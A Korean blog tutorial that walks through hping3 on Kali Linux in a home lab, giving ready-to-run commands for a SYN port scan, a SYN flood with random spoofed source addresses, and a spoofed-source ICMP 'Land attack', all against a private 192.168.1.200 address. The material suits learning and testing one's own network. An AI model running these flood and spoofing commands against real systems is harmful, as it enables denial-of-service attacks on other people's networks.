[kali linux]hping3를 이용하여 포트스캔 or dos공격하기

2019년 12월 12일 No Comments

hping3 은 네트워크에 존재하는 서버, pc,네트워크 장비등에 ping 명령어 보다 다양한 기능을 제공하는 명령어 이다.
기본적은 kali linux에는 자동으로 설치되어 있으며, 대표적인 기능으로는 port scan, syn flood 공격 등등을 할 수 있다.

사용법

기본적으로 hping3 –help를 이용하면 사용법(usage)부터 각종 옵션들까지 확인할 수 있다.

usage: hping3 host [options]

예시(포트스캔)

hping3 –scan 1-1000 -S 192.168.1.200
타겟 ip(192.168.1.200)의 1 ~ 1000번까지 사용하는 포트가있는지 체크

테스트를 위해 열어둔 80번 포트만 탐지되었다. 이걸 기반으로 ddos공격을 해보겠다.

예시(synflood 공격[DDOS])

hping3 –rand-source 192.168.1.200 -p 80 -S –flood -c 100
랜덤 ip(source)에서 타겟의 IP(192.168.1.200)의 80번 포트로 Syn Flood 공격을 100개의 패킷만 하는것이다.

나는 pfsense 방화벽을 내부네트워크에 구축해서 사용하고있기 때문에 방화벽 alert로그에서 확인이 된다.

랜덤 source

예시(LandAttack)

LandAttack은 타겟 IP와 source IP를 동일 하게 함으로써 어디서 공격이들어왔는지 변조하는 공격이다
hping3 -1 -a 192.168.1.200 -d 65000 192.168.1.200 -c 100
타겟(192.168.1.200)으로 source ip(-a 192.168.1.200)가 icmp(-1옵션) 65000패킷사이즈(-d 65000)로 공격을 100개의 패킷만 하는것이다.

 

————————————————–

사이트 리뉴얼중입니다~

서버(Linux, ESXi), NAS(헤놀로지, ESXi 및 IT관련 정보, 기타 등등을 공유하는 커뮤니티 SVRFORUM을 새로 만들었습니다.
많은 가입(?) 부탁드립니다~
https://svrforum.com

이전글들은 모두 상단 메뉴의 Blog 글 모음에있습니다!

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다

홈서버 IT 커뮤니티 SVRFORUM
Link